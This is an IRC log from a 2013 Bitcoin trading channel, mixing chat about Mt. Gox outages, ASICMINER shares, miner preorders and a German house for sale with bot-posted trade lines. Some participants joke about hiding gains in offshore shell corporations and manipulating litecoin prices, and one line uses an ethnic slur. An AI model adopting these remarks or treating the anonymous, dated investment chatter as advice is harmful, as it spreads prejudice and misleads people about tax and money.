http://www.youtube.com/watch?v=DALvNCbgcKg May 09 05:42:24 Idk why but that house seems like what I'd expect from there. May 09 05:42:36 Rather castle like.. Do you guys mostly live in castles? May 09 05:42:47 [BTCTC] [ASICMINER-PT] 2 @ 1.484499 = 2.969 BTC [-] May 09 05:42:55 KRS1 67? where did you hear that May 09 05:43:03 yes pgp sad May 09 05:43:07 [BTCTC] [ASICMINER-PT] 3 @ 1.4845 = 4.4535 BTC [+] May 09 05:43:10 ;;ticker May 09 05:43:11 BTCUSD ticker | Best bid: 109.30000, Best ask: 109.49999, Bid-ask spread: 0.19999, Last trade: 109.49999, 24 hour volume: 60966.84086930, 24 hour low: 108.80000, 24 hour high: 116.77700, 24 hour vwap: 112.99253 May 09 05:43:43 [BTCTC] [ASICMINER-PT] 4 @ 1.485 = 5.94 BTC [+] May 09 05:45:08 well, gox is down hard.. so.. who know what reality is... May 09 05:46:13 though enjoying music video, KSR1... May 09 05:46:52 who is going to bitcoin conference? May 09 05:46:59 i liked it..happy to share. May 09 05:48:04 hmmm..wonder if those who are quiet right now are on the ddos tip. May 09 05:48:29 hunded million dolla! May 09 05:48:30 lol not that kind of pin LMAO May 09 05:48:35 hunded million dolla! May 09 05:48:49 I have to hook that up one day..that is pimp. May 09 05:49:00 its dorra, not dolla. May 09 05:49:03 Woke up in a Bugatti. May 09 05:49:20 Ah so! Zhank you! May 09 05:49:32 https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcR99yKR0Quc48quTseh2TZcdcoDLtGAT1eI-TFTI8e9w_zHn4y8 May 09 05:50:20 lmao good one May 09 05:51:13 lol May 09 05:52:11 [BTCTC] [BITVPS] 120 @ 0.0013 = 0.156 BTC [+] May 09 05:52:30 ;;goxlag May 09 05:52:31 Error: Problem retrieving gox lag. Try again later. May 09 05:52:33 awww May 09 05:53:08 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [-] May 09 05:53:28 ^ what hapnd there? May 09 05:53:50 gox backend is down imo May 09 05:54:03 database attack or breakdown May 09 05:54:15 just guessing May 09 05:54:32 goxxed May 09 05:54:52 1.199 ASICMINER trade was an option exercise May 09 05:55:09 yep May 09 05:55:11 Well played May 09 05:55:13 that occurred to me May 09 05:55:18 i'm just slow atm May 09 05:55:24 http://politicalmetals.files.wordpress.com/2011/03/bart-chilton1.jpg May 09 05:55:45 looks like a antagonist from a Die Hard movie May 09 05:55:49 or, German May 09 05:55:57 or Finnish May 09 05:56:00 or such May 09 05:56:02 [HAVELOCK] [SDICE] 2 @ 0.3 = 0.6 BTC [-] May 09 05:56:07 no matter how you try to define goxIncompetence, you will always encounter stack overflow May 09 05:56:32 lol May 09 05:56:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.0149 = 0.0298 BTC [+] May 09 05:57:19 stack fucking overflow.... May 09 05:57:22 pgp: did your client grok my cosby? May 09 05:57:26 in -trollbox May 09 05:58:31 lol May 09 05:58:43 how do i join this trollbox May 09 05:58:47 i grok a lot of lf May 09 05:58:49 i'm properly sauced now May 09 05:59:01 excellent May 09 05:59:04 remember that guy Bugpowder? May 09 05:59:08 let the games begin May 09 05:59:12 sup May 09 05:59:20 ThickAsThieves: #bitcoin-trollbox May 09 05:59:22 join it May 09 05:59:42 I picked the wrong evening to buy back in May 09 05:59:57 did you? May 09 06:00:19 ;;ticker --last May 09 06:00:20 109.26001 May 09 06:00:22 i'm almost all in BTC at this point May 09 06:00:23 <[\\\]> oh look May 09 06:00:24 <[\\\]> 503 Service Temporarily Unavailable May 09 06:00:28 <[\\\]> good old gox May 09 06:00:41 got maybe $10k cash left just in case it crashes majorly May 09 06:00:57 technically i'm almost all in asicminer... May 09 06:00:59 <[\\\]> ThickAsThieves, can I borrow $10k? May 09 06:01:05 no May 09 06:01:13 <[\\\]> ThickAsThieves: what if AM goes rogue? May 09 06:01:28 this might crash when it comes back up? May 09 06:01:28 sold $10k of AM shares on havelock today alone :p May 09 06:01:31 hopefully ive sold out on all my PTs by then May 09 06:01:33 thought it would shoot May 09 06:01:40 topace, I rebought May 09 06:01:50 same May 09 06:01:52 ah nice May 09 06:02:03 you already have more on havelock than you were originally planning i see :) May 09 06:02:37 yep May 09 06:02:54 i put every BTC i got from selling shares on all the PTs May 09 06:02:57 into more shares May 09 06:03:05 i've gone AM bullish May 09 06:03:10 :) May 09 06:03:13 #bitcoin-rt is working May 09 06:03:20 well ill keep buying blades so that should help the share value :p May 09 06:03:47 <[\\\]> is bfl shipping yet? May 09 06:03:58 accoridng to their email they sent last week yea. May 09 06:03:59 but no May 09 06:04:01 not really May 09 06:04:06 "we're shipping!" May 09 06:04:08 hah May 09 06:04:26 gox bak May 09 06:05:22 Yeah, 35 units, half to media isn't really 'shipping', it's demoing May 09 06:05:31 it's scamming May 09 06:05:47 <[\\\]> I'm glad I didn't put everything I had with them back in the day May 09 06:06:10 <[\\\]> fucking gox: May 09 06:06:11 <[\\\]> Multiple distinct Location headers received. This is disallowed to protect against HTTP response splitting attacks. May 09 06:06:11 <[\\\]> Error code: ERR_RESPONSE_HEADERS_MULTIPLE_LOCATION May 09 06:06:16 I'm still holding out for my 30GH miner May 09 06:06:25 < 60GH x 2 May 09 06:06:30 I probably should have gone for the refund, but I'll stick with it now May 09 06:06:33 <[\\\]> what are you holding parseval? May 09 06:06:56 NEver seen this one before May 09 06:06:57 302 Found May 09 06:07:02 ill buy your order..how much you want May 09 06:07:07 <[\\\]> its a permanent redirect May 09 06:07:12 <[\\\]> they're using cloudflare May 09 06:07:16 <[\\\]> but since much of the page is dynamic May 09 06:07:16 Nah, I'm going to keep it May 09 06:07:19 :P May 09 06:07:22 <[\\\]> cloudflare does nothing for them May 09 06:07:39 Nobody will make their money back on the BFL shit May 09 06:07:44 I'm just holding a preorder for the one unit, and running a couple of video cards atm, nothing major May 09 06:10:00 I'll be able to sell mine in 5 years for twice as much as collectible nostalgia technology..It'll sit on a shelf right between a ColecoVision and an Atari 2600 May 09 06:10:08 that's... May 09 06:10:12 not the dumbest thing ever. May 09 06:10:16 but close May 09 06:10:36 not an investment strategy May 09 06:10:40 [MPEX] [S.MPOE] 4321 @ 0.0007181 = 3.1029 BTC [-] May 09 06:10:40 bitcoin beanie babies... May 09 06:10:41 [MPEX] [S.MPOE] 6292 @ 0.00071835 = 4.5199 BTC [+] May 09 06:11:28 A pet rock engraved with a private key May 09 06:11:39 you will be able to buy 20 of them with the current value in bitcoin. May 09 06:12:16 theres a $60K order on btc-e at $105.99 May 09 06:12:17 Asicminer USB miners will probly be worth more than a BFL minirig in 5 years May 09 06:12:35 but the BFL miner has the cool butterfly logo May 09 06:12:54 that is a fact May 09 06:13:21 new topic! May 09 06:13:23 wtf is this shit: May 09 06:13:24 https://github.com/macourtney/Dark-Exchange May 09 06:13:25 why is anything fpga painfully expensive and low hash output May 09 06:13:29 Asicminer should just steal that logo May 09 06:13:37 and make the generic asic logo May 09 06:13:43 like a real chinaman May 09 06:15:13 darklulz May 09 06:15:56 a cutting critique! May 09 06:16:02 [HAVELOCK] [ASICM] 1 @ 0.014 BTC [-] May 09 06:17:30 [BTCTC] [ASICMINER-PT] 2 @ 1.479999 = 2.96 BTC [+] May 09 06:17:58 [BTCTC] [ASICMINER-PT] 3 @ 1.48 = 4.44 BTC [+] May 09 06:18:16 bithouse? http://www.redfin.com/CA/Los-Angeles/1436-Allenford-Ave-90049/home/6839298 May 09 06:18:49 walls might be plywood May 09 06:19:24 mid-century modern? nah dood May 09 06:20:02 [HAVELOCK] [ASICM] 20 @ 0.014 = 0.28 BTC [-] May 09 06:20:11 how is that auction for the shithole in germany going? May 09 06:20:30 ThickAsThieves: dat asbestos May 09 06:22:02 [HAVELOCK] [ASICM] 50 @ 0.014 = 0.7 BTC [-] May 09 06:23:02 [HAVELOCK] [ASICM] 23 @ 0.014 = 0.322 BTC [-] May 09 06:23:04 [HAVELOCK] [ASICM] 77 @ 0.0141 = 1.0857 BTC [+] May 09 06:26:02 [HAVELOCK] [ASICM] 75 @ 0.0141 = 1.0575 BTC [+] May 09 06:26:42 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:27:37 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:28:01 [HAVELOCK] [ASICM] 17 @ 0.0141 = 0.2397 BTC [+] May 09 06:28:03 [HAVELOCK] [ASICM] 8 @ 0.0142 = 0.1136 BTC [+] May 09 06:28:14 dat broker May 09 06:28:45 [BTCTC] [ASICMINER-PT] 2 @ 1.479799 = 2.9596 BTC [-] May 09 06:28:57 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:29:52 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:30:02 [HAVELOCK] [ASICM] 100 @ 0.0142 = 1.42 BTC [+] May 09 06:31:26 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:31:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18501 BTC [-] May 09 06:32:02 [BTCTC] [ASICMINER-PT] 1 @ 1.479799 BTC [-] May 09 06:34:02 [HAVELOCK] [ASICM] 122 @ 0.0142 = 1.7324 BTC [+] May 09 06:34:03 [HAVELOCK] [ASICM] 150 @ 0.01425 = 2.1375 BTC [+] May 09 06:34:04 [HAVELOCK] [ASICM] 100 @ 0.0143 = 1.43 BTC [+] May 09 06:34:05 [HAVELOCK] [ASICM] 128 @ 0.0145 = 1.856 BTC [+] May 09 06:34:55 omnomnom AM shares May 09 06:36:21 [MPEX] [S.MPOE] 1771 @ 0.0007181 = 1.2718 BTC [-] May 09 06:36:23 [MPEX] [S.MPOE] 3786 @ 0.00071835 = 2.7197 BTC [+] May 09 06:37:16 Fuckit May 09 06:37:28 I sold at 0.41 May 09 06:37:58 bubble May 09 06:38:57 I found some other good investments, luckily May 09 06:44:24 [MPEX] [S.MPOE] 8572 @ 0.00071835 = 6.1577 BTC [+] May 09 06:45:20 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18501 BTC [-] May 09 06:52:42 [BTCTC] [GSDPT] 10 @ 0.003 = 0.03 BTC [+] May 09 06:52:52 [BTCTC] [GSDPT] 20 @ 0.002945 = 0.0589 BTC [-] May 09 06:53:00 [BTCTC] [GSDPT] 1012 @ 0.00294 = 2.9753 BTC [-] May 09 06:53:55 Namworld: What at 0.41? May 09 06:54:02 [HAVELOCK] [SDICE] 5 @ 0.2965 = 1.4825 BTC [-] May 09 06:54:04 [HAVELOCK] [SDICE] 17 @ 0.29 = 4.93 BTC [-] May 09 06:54:05 [HAVELOCK] [SDICE] 10 @ 0.29 = 2.9 BTC [-] May 09 06:54:06 his AM shares I assume May 09 06:54:41 .41 is the price I started buying at May 09 06:55:27 Namworld you should have told me, it's going for a lot more.. I would have paid more. May 09 06:55:37 that is badass, thickasthieves May 09 06:55:59 what made you have faith back then May 09 06:56:07 I was folding May 09 06:56:16 5x ROI since IPO is pretty darned good May 09 06:57:07 [BTCTC] [ASICMINER-PT] 10 @ 1.45 = 14.5 BTC [-] May 09 06:57:11 I dont recall the details of why I bought back then, May 09 06:57:18 but I also sold all those shares May 09 06:57:44 to sell BTC during the bubble burst I think May 09 06:57:44 wow this was like a 0-day exploit May 09 06:57:50 to rebuy at lower price May 09 06:58:07 i mostly sold out to make up my $3K investment on my rigs May 09 06:58:11 kept some May 09 06:58:21 i invested $25k cash total in BTC May 09 06:58:27 well done May 09 06:58:28 all of which has been paid back May 09 06:58:28 baller May 09 06:58:40 baller is putting it lightly..thats gangster May 09 06:58:57 i'm sure others here can claim much more May 09 06:59:09 always a bigger fish huh May 09 06:59:14 it was an investment decision May 09 06:59:21 i even consulted with the wifey May 09 06:59:30 made a presentation about bitcoin for her May 09 06:59:36 made a plan May 09 06:59:37 f'n taxes are prolly your biggest headache these days huh May 09 06:59:40 etc May 09 06:59:46 yes and no May 09 06:59:54 i havent entirely sorted that out yet May 09 06:59:59 and now you are the man for doing it all right like that May 09 07:00:06 since it all happened in 213 May 09 07:00:08 2013 May 09 07:00:32 i also used cash from my business to do the buying May 09 07:00:39 so i have some flex there May 09 07:01:01 [HAVELOCK] [ASICM] 30 @ 0.0142 = 0.426 BTC [-] May 09 07:01:09 if its an s-corp u can prolly realize those gains and keep it in the coffers without having to pay anything just yet May 09 07:01:30 i have many things i can claim as expenses at well May 09 07:01:45 as* May 09 07:02:05 ThickAsThieves: xv May 09 07:02:06 http://i.imgur.com/EUe0FDs.png May 09 07:02:14 haha nice May 09 07:02:25 tonight :) May 09 07:02:28 daytrading btc got too gambley for me May 09 07:03:04 well the thing is, an incorporated business is its own legal entity and any money it makes doesnt get taxed until its withdrawn as salary or whatever..you can figure out how to spend it tax free from there..max the ira's and what not..make tax free "investments" into the "company" that get sspent on this and that May 09 07:03:05 i;m almost at .3% May 09 07:03:06 I have a pro CPA looking at the tax situation May 09 07:03:08 on gox May 09 07:03:10 the government likes green investments atm May 09 07:03:11 will update. May 09 07:03:17 that would be appreciated Bug May 09 07:03:28 0.3% is a nice discount tier May 09 07:03:32 after that who gives a shit May 09 07:03:35 yeh lawyers are real good at that shit..meh I went to business school I only know the "proper" way to do things. May 09 07:03:45 the CPA is going to do it proper May 09 07:04:02 [HAVELOCK] [SDICE] 1 @ 0.3034 BTC [+] May 09 07:04:12 yeh they can pull off some cool shit so you dont pay as much May 09 07:04:24 i forgot i had some BTC on gox still :) May 09 07:04:32 I would have had to set shit up ahead of time in offshore shell corps to avoid taxes, instead of my personal gox account May 09 07:04:41 and I dunno how to do that. May 09 07:04:48 yet :-P May 09 07:04:56 just call a bank in Bermuda =D **** BEGIN LOGGING AT Thu May 9 14:56:29 2013 May 09 14:56:31 [MPEX] [S.MPOE] 1821 @ 0.00071203 = 1.2966 BTC [-] May 09 14:56:33 [MPEX] [S.MPOE] 415 @ 0.00070989 = 0.2946 BTC [-] May 09 14:56:35 [MPEX] [S.MPOE] 4321 @ 0.00070979 = 3.067 BTC [-] May 09 14:56:36 [MPEX] [S.MPOE] 4293 @ 0.00070978 = 3.0471 BTC [-] May 09 14:56:46 mp you know about this? EX] [S.MPOE] 1821 @ 0.00071203 = 1.2966 BTC [-] May 09 14:56:46 [MPEX] [S.MPOE] 415 @ 0.00070989 = 0.2946 BTC [-] May 09 14:56:46 [MPEX] [S.MPOE] 4321 @ 0.00070979 = 3.067 BTC [-] May 09 14:56:46 [MPEX] May 09 14:56:50 fuck May 09 14:56:59 http://www.anyoption.com/bitcoin-options May 09 14:57:37 Looks neat... May 09 14:57:43 but is it a scam? May 09 14:58:04 *shrugs* not planning to touch it anyway May 09 14:58:11 yeah May 09 14:58:18 they're in cyprus May 09 14:58:23 Doesn't look like it May 09 14:58:25 hmm May 09 14:58:26 scam state :-) May 09 14:58:46 http://www.anyoption.com/about-anyoption-trading May 09 14:58:49 am is over 20 th now May 09 14:59:22 "Our main data source for pricing and expiry rates is Thomson Reuters." May 09 15:00:02 ;;bc,stats May 09 15:00:06 Current Blocks: 235301 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 570 blocks | Next Difficulty In About: 3 days, 13 hours, 30 minutes, and 0 seconds | Next Difficulty Estimate: 10874674.6045 | Estimated Percent Change: 7.92337 May 09 15:02:16 its a scam state, but also one that needs solutions..so could this be one May 09 15:02:36 hi all May 09 15:02:39 John Cane: What do you mean by 4 btc community? May 09 15:02:40 akmar: btc means bitcoin its is the currancy code May 09 15:02:40 akmar: how long has this site been around? May 09 15:02:40 John Cane: Our platform is active since 2008. May 09 15:02:46 they say they ahve been here since 2008 hahaha May 09 15:02:54 lolk May 09 15:02:54 this is not a solution... just a betting that doesn't touch bitcoin actually May 09 15:03:06 Hello mircea_popescu! May 09 15:03:10 hi mircea May 09 15:03:12 anyway, in the interest of full disclosure : May 09 15:03:29 about ten days ago i was cleanning out my lawnmower when something inside pricked my finger May 09 15:03:41 which made a fucking obnoxious wound kept me from typing properly for a coupla days May 09 15:03:42 ohai May 09 15:03:49 but then! it didn't heal properly! May 09 15:04:10 so now i just had it surgified, and apparently the doctor removed a very fine thorn bit from my finger. May 09 15:04:15 so now you are Mircea Four-fingered. May 09 15:04:23 at this point it either heals or i get magical flesh eating bacteria and die. May 09 15:04:36 so pray for me or else all your bitcoinz! May 09 15:04:38 hmm, i would ahve assumed you paid people to cut your grass May 09 15:04:41 s/magical/romanian/ May 09 15:04:56 Chaang-Noi its not that much and i cant sit in the chair all day long. May 09 15:04:58 Chaang-Noi: why pay someone to do the fun things? May 09 15:05:12 Chaang-Noi: mp prolly likes to inhale that fresh grass smell May 09 15:05:16 can you make withdraws with 4 fingers ? May 09 15:05:25 jurov i have a mulch pile and everything May 09 15:05:28 error4733 nope. May 09 15:05:34 lol May 09 15:05:37 hehe May 09 15:05:41 gotta push 6 buttons at the same time May 09 15:05:43 shit May 09 15:05:46 yard work, dont enjoy it so much, i just take walks with my dogas May 09 15:05:47 10-finger verification system May 09 15:05:48 dogs May 09 15:05:53 i have it set up like a sort of mario knockoff May 09 15:05:53 gets ya every time May 09 15:06:01 sorry error4733 but your withdrawal is in another castle. May 09 15:06:02 [HAVELOCK] [ASICM] 250 @ 0.01495 = 3.7375 BTC [+] May 09 15:06:12 first time I've seen binary options for btc May 09 15:06:29 Chaang-Noi unless you're 85lbs coma survivor lawnmowing is no hard work eh ? May 09 15:06:33 not like i work my own coal mine. May 09 15:06:33 all my shiny gold coin... May 09 15:06:40 sdice has many options May 09 15:06:41 mircea_popescu: LOL May 09 15:06:42 actually i'm the mowing expert in our family, too May 09 15:06:43 KRS1 nah, were like 2-3 before. May 09 15:07:02 [HAVELOCK] [ASICM] 50 @ 0.0151 = 0.755 BTC [+] May 09 15:07:02 not much call for that eh May 09 15:07:03 [HAVELOCK] [ASICM] 50 @ 0.01512 = 0.756 BTC [+] May 09 15:07:04 [HAVELOCK] [ASICM] 50 @ 0.01512 = 0.756 BTC [+] May 09 15:07:05 [HAVELOCK] [ASICM] 55 @ 0.01524 = 0.8382 BTC [+] May 09 15:07:05 jurov i didn't know kensians had families :D May 09 15:07:35 kensians? May 09 15:07:39 no it is not hard work, id rather do hard work than cut grass something i can pay the local combodian 3$ to do it (and he does a hell of a better job than i could do anyway) May 09 15:07:57 (that, for the two irc trolls who don't know finance at all, was a joke, in relation to all the recent furror about nial making that stateemnt re keynes being gay) May 09 15:07:58 3$/day May 09 15:07:59 i dont mind doing work, but i dont like doing work where i dont need to think. May 09 15:08:00 ? May 09 15:08:03 [HAVELOCK] [ASICM] 50 @ 0.01524 = 0.762 BTC [+] May 09 15:08:04 [HAVELOCK] [ASICM] 100 @ 0.01525 = 1.525 BTC [+] May 09 15:08:05 [HAVELOCK] [ASICM] 100 @ 0.0155 = 1.55 BTC [+] May 09 15:08:20 Chaang-Noi if you don't think you get your finger pricked. May 09 15:08:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.01467 = 0.1027 BTC [-] May 09 15:08:28 error that is like 3 hours of work, and i over pay May 09 15:08:35 mp :) May 09 15:08:42 [BTCTC] [TAT.ASICMINER] 27 @ 0.014675 = 0.3962 BTC [+] May 09 15:08:55 lol over pay like a boss... May 09 15:09:00 $3! May 09 15:09:03 [HAVELOCK] [ASICM] 150 @ 0.0155 = 2.325 BTC [+] May 09 15:09:23 i live near camobida, lots of works need work May 09 15:09:37 1$/h nice wage ! at least you can buy food to stay alive May 09 15:09:49 a teacher makes $200 a month starting out, a no skilled illigal cambodian gets fuck all May 09 15:09:56 did you try offering few teaspoons of bitcoins? May 09 15:10:02 [HAVELOCK] [ASICM] 100 @ 0.01512 = 1.512 BTC [-] May 09 15:10:02 a good meal is about a dollar here May 09 15:10:03 [HAVELOCK] [ASICM] 500 @ 0.01512 = 7.56 BTC [-] May 09 15:10:04 [HAVELOCK] [ASICM] 50 @ 0.0151 = 0.755 BTC [-] May 09 15:10:20 AM over 1.5 nice :) May 09 15:10:36 and that was a sell off, lol May 09 15:11:02 [HAVELOCK] [ASICM] 250 @ 0.0155 = 3.875 BTC [+] May 09 15:11:06 if you guys had 100k usd in fiat and wanted to start a btc business what would you do? May 09 15:11:24 Chaang-Noi i would hire fred wilson. May 09 15:11:26 gest house in thailand May 09 15:11:37 i have a few ideas May 09 15:11:40 guest* May 09 15:11:45 fred wilson. to cut my grass? May 09 15:11:55 i have a google search killer idea May 09 15:12:10 and an online training software SaaS idea May 09 15:12:12 people now sign emails to me with Hoping to not get in your "dumb persons" list, X May 09 15:12:21 but 100k probly aint enough May 09 15:12:25 Chaang-Noi pretty cool idea that. May 09 15:12:31 :) May 09 15:14:05 i know a guy who wants to get into a btc and have a business, has 100k but i have no idea what to do with it May 09 15:14:18 only idea is to have an exchange but i dont know... May 09 15:14:24 oh, a bitcoin biz May 09 15:14:27 porn? May 09 15:14:28 and in case you need deratisation, i also recommend you to hire the rat poison expert, what was his name... May 09 15:14:31 drug ? May 09 15:14:48 hmm btc and porn May 09 15:14:55 do people still pay for porn? May 09 15:14:58 bitcoin PR/mktg agency May 09 15:15:02 [HAVELOCK] [ASICM] 100 @ 0.015552 = 1.5552 BTC [+] May 09 15:15:03 1$/h ? May 09 15:15:11 Chaang-Noi if he's located in where you are he could start a business making retreats for bitcoiners. May 09 15:15:13 yeah bitcoin needs good pr people May 09 15:15:27 he is in the usa May 09 15:15:27 bitcoin consulting in general May 09 15:15:30 mp +1 May 09 15:15:45 if he's in the usa he should spend it to relocate May 09 15:15:46 Chaang-Noi: just send him to supernode conference. May 09 15:15:49 best business decision ever. May 09 15:16:09 yeah he works and has a family May 09 15:16:22 which is why it costs 100k May 09 15:16:27 i think he would just give me the 100k to do whatever May 09 15:16:34 yes May 09 15:16:48 yeah he wont go, iv told him for years to get the fuck out May 09 15:17:11 use it to manipulate litecoin prices May 09 15:17:17 you know this is so very much like pre-iron curtain europe May 09 15:17:26 people just don't want to go. May 09 15:17:30 then they queue up for bread. May 09 15:17:44 it wont be bread this time May 09 15:17:55 actually if it were bread i tyhink it'd be a blessing May 09 15:18:01 we're too food-focused May 09 15:18:03 think, a 600 calorie average diet in the us for a year ?! May 09 15:18:06 itll be somehting else May 09 15:18:07 population health +9000 May 09 15:18:17 usa has a lot of food May 09 15:18:23 Chaang-Noi : how much to buy a land and built a nice guest house in thailand ? Not the most expensive place but not the worst neither May 09 15:18:41 he wants to do just btc stuff May 09 15:18:56 just buy BTC hand hoar ? May 09 15:19:00 id do tourist shit in myanmar, loas or cambodia, too much shit here May 09 15:19:10 roll the 100k on sdice 85%, probly save a lot of time May 09 15:19:20 i told him to just hold btc, buti thought id ask here if anyone had any ideas May 09 15:19:24 ThickAsThieves lol May 09 15:19:31 Chaang-Noi obviously he can buy shares. May 09 15:19:40 you don't need us to tell you that. May 09 15:19:57 if anything he would buy AM May 09 15:19:58 AM shares ! May 09 15:20:17 but i doubt he will, he wants to get into the almost virgin btc world May 09 15:20:37 am at 1.5 ? May 09 15:20:46 about that yeah May 09 15:20:51 over 20 th now May 09 15:21:19 btc space program May 09 15:21:19 Chaang-Noi: just send him around here May 09 15:21:28 let himself explain what he wants May 09 15:21:33 btc satellite for internet access to syria etc May 09 15:21:36 okay ill do that May 09 15:21:43 if he can figure out irc May 09 15:22:10 he can use webchat in worst case May 09 15:22:16 i was wondering, lets say i was in antartica and i wanted to send some btc, how the fuck would that work? May 09 15:22:28 use iridium? May 09 15:22:33 do they have satalite internet there? May 09 15:22:36 carrier pigeon May 09 15:22:43 they do May 09 15:22:52 sure they do have satellite May 09 15:23:00 id ahve to buy a special phone or computer? May 09 15:23:06 srsly, i made the same mistake, try to invest instead of bought btc ! i punch myself eveytime i saw my stock take the dust May 09 15:23:39 yes May 09 15:23:45 iridum with modem May 09 15:23:59 so it should be doable with out too much trougble if i find myself down there? May 09 15:24:00 Chaang-Noi: http://www.iridium.com/Products.aspx May 09 15:24:14 https://en.wikipedia.org/wiki/Telecommunications_in_Antarctica May 09 15:24:27 good links guys thx May 09 15:25:22 https://www.bitmit.net/en/item/21753-satellite-phone-motorola-9505-world-free-shipping-escrow May 09 15:26:36 error, does not seem like i could run a btc client on that phone May 09 15:26:40 http://polimedia.us/dtng/c/src/136810239326.jpg May 09 15:26:44 (no tits) May 09 15:27:46 okay so im sure i could get something to work, if i make it down there ill have to look into it more May 09 15:28:42 anyone have any idea if this house is worth more than 50 btc? https://bitcointalk.org/index.php?topic=199199.0 May 09 15:29:03 [HAVELOCK] [HIM] 2 @ 2.0001 = 4.0002 BTC [-] May 09 15:30:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.014675 BTC [+] May 09 15:31:02 [HAVELOCK] [ASICM] 100 @ 0.01545 = 1.545 BTC [-] May 09 15:31:12 i just wonder if it is a scam May 09 15:32:03 [HAVELOCK] [ASICM] 100 @ 0.015475 = 1.5475 BTC [+] May 09 15:32:18 havelockers ball May 09 15:32:29 Chaan-Noi u dont run any client on phone. you connect the phone to your laptop and its like a modem May 09 15:32:45 er, havelockers are ballers May 09 15:33:11 error okay cool May 09 15:33:26 anyone here german? May 09 15:34:11 I'm german... May 09 15:34:39 andreas what do you think this house is worth? https://bitcointalk.org/index.php?topic=199199.0 May 09 15:34:53 if the house is structurally sound, then it's worth 50btc May 09 15:35:02 [HAVELOCK] [ASICM] 60 @ 0.015475 = 0.9285 BTC [+] May 09 15:35:21 no way i could tell with out going there eh? May 09 15:35:44 a house in germany is worth 50 btc just on the premise it is allowed to stand. May 09 15:36:03 [HAVELOCK] [ASICM] 1 @ 0.015475 BTC [+] May 09 15:36:04 [HAVELOCK] [ASICM] 50 @ 0.015475 = 0.7738 BTC [+] May 09 15:36:08 hmm, 100 btc? May 09 15:36:39 yeah...I followed this thread for a while, too... May 09 15:37:03 [HAVELOCK] [HIM] 6 @ 2.06 = 12.36 BTC [+] May 09 15:37:09 I'm not so sure about the monument protection issue yet. May 09 15:37:16 i have no idea what houses are worth in germany May 09 15:37:26 although the owner claims otherwise, I know... May 09 15:37:35 yeah but might be scam May 09 15:37:40 or a lie May 09 15:37:45 he wont give us the address May 09 15:37:56 atm, I think there will be restrictions if you renovate it... May 09 15:38:14 well, what if i just want to burn it to the ground? May 09 15:38:20 so...you have to keep the facade, if you renovate it. May 09 15:38:35 id guess that would be costly? May 09 15:38:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.014675 = 0.0881 BTC [+] May 09 15:38:54 you won't be allowed to use modern windows with plastic frames etc. May 09 15:39:03 [HAVELOCK] [ASICM] 1 @ 0.015475 BTC [+] May 09 15:39:31 I guess you'll have to replace all electricity lines, water installation etc. May 09 15:39:32 well the outside does look cool May 09 15:39:33 there is not street view there.. but few interesting photos of other ruins May 09 15:39:56 you won't even be allowed just to leave it rotting! May 09 15:40:00 jurov you cant find it on google? May 09 15:40:03 [HAVELOCK] [ASICM] 38 @ 0.015475 = 0.5881 BTC [+] May 09 15:40:18 lol i cant just leave it? May 09 15:40:19 So the local authorities will force you to renovate it, I guess... May 09 15:40:41 next problem...who wants to live there? May 09 15:40:44 no, i thought i'll find it via street view, ichstedt is small May 09 15:40:51 any idea how much that woujld cost? i honestly have no idea May 09 15:40:53 but only a few photos there May 09 15:41:02 [HAVELOCK] [ASICM] 100 @ 0.015479 = 1.5479 BTC [+] May 09 15:41:03 in most areas there are no stores or shops anymore. May 09 15:41:10 jurov think its a scam or just not enough photos? May 09 15:41:25 there is never going to be "Enough photos" May 09 15:41:33 so I guess you'll have to drive like 20 miles just to buy a slice of bread. May 09 15:41:44 Chaang-Noi: how would i know i just report what i found on google maps May 09 15:41:56 there's a very good chance, that there's no internet connection there. May 09 15:42:08 seen this : http://www.reddit.com/r/Bitcoin/comments/1dyr12/coinbase_coinlab_and_others_sued_for_violating/ ? May 09 15:42:13 [HAVELOCK] [ASICM] 100 @ 0.0155 = 1.55 BTC [+] May 09 15:42:18 jurov no idea, just asking for your thoughts, iv not checked it out May 09 15:42:24 [MPEX] [S.DICE] 600 @ 0.003001 = 1.8006 BTC [-] May 09 15:42:26 [MPEX] [S.DICE] 60 @ 0.00295 = 0.177 BTC [-] May 09 15:42:28 [MPEX] [S.DICE] 1000 @ 0.0029001 = 2.9001 BTC [-] May 09 15:42:31 actually it looks quite populous area.. and they promise 8gbit internet May 09 15:42:43 what? May 09 15:42:44 truffles if i do so in the next 3 days May 09 15:43:02 [HAVELOCK] [ASICM] 100 @ 0.0156 = 1.56 BTC [+] May 09 15:43:05 [MPEX] [S.DICE] 8334 @ 0.0029 = 24.1686 BTC [-] May 09 15:43:07 halle (quite big city) 71 km away , not bad May 09 15:43:15 davout that 5mn round just in time eh. May 09 15:43:17 andreas, read the op May 09 15:43:24 you can't get such a connection in the middle of berlin or munich as a private user... May 09 15:43:56 http://postimg.org/image/ylmkg86op/ seems next to a church May 09 15:44:03 [HAVELOCK] [ASICM] 19 @ 0.0159 = 0.3021 BTC [+] May 09 15:44:09 mircea_popescu: what? May 09 15:44:29 that was the fred wilson refernce. coinbase closed a 5mn deal a little back May 09 15:44:43 not stellar, but hey. they needed the cash to stay in the picture. May 09 15:44:49 oh lol, i was like 5 minutes what? May 09 15:45:11 yes the church is on panoramio May 09 15:45:12 yea, i heard about it May 09 15:45:12 minutes is min :D May 09 15:45:32 paymium's funding is apparently May 09 15:45:36 in another castle May 09 15:45:43 for the time being May 09 15:46:01 5mn nom nom nom May 09 15:46:02 I can tell you, that better houses where sold at the hunsrück or in hessen for 15000-20000 euros. May 09 15:46:21 with functioning water and electricity installation. May 09 15:46:28 [BTCTC] [ASICMINER-PT] 1 @ 1.455 BTC [+] May 09 15:46:35 so you can move in within 4 weeks, or so. May 09 15:46:50 brrrrr hunsrueck... friend ended there, has to pay 80 euro for half decent internet May 09 15:47:01 not renovate it for 5 years... May 09 